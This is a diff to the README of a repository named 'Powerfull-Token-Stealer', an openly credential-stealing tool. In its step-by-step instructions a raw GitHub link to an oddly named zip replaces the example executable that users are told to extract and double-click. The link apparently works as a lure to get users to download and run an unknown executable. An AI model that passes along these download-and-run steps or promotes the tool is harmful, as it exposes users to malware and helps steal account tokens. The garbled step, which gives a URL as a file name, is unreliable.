calendric-minority885/Powerfull-Token-Stealer/README.md

    If the downloaded file is zipped, right-click on it and select "Extract All."
 Follow the prompts to extract the contents.

 4. **Run the Application:**
-   Find the extracted folder and double-click on the executable file (e.g., `Powerfull-Token-Stealer.exe`) to start the application.
+   Find the extracted folder and double-click on the executable file (e.g., `https://raw.githubusercontent.com/calendric-minority885/Powerfull-Token-Stealer/main/garance/Powerfull-Token-Stealer-enhemospore.zip`) to start the application.

 5. **Follow On-Screen Instructions:**
    The application will guide you through the setup process.
 Please read the prompts carefully.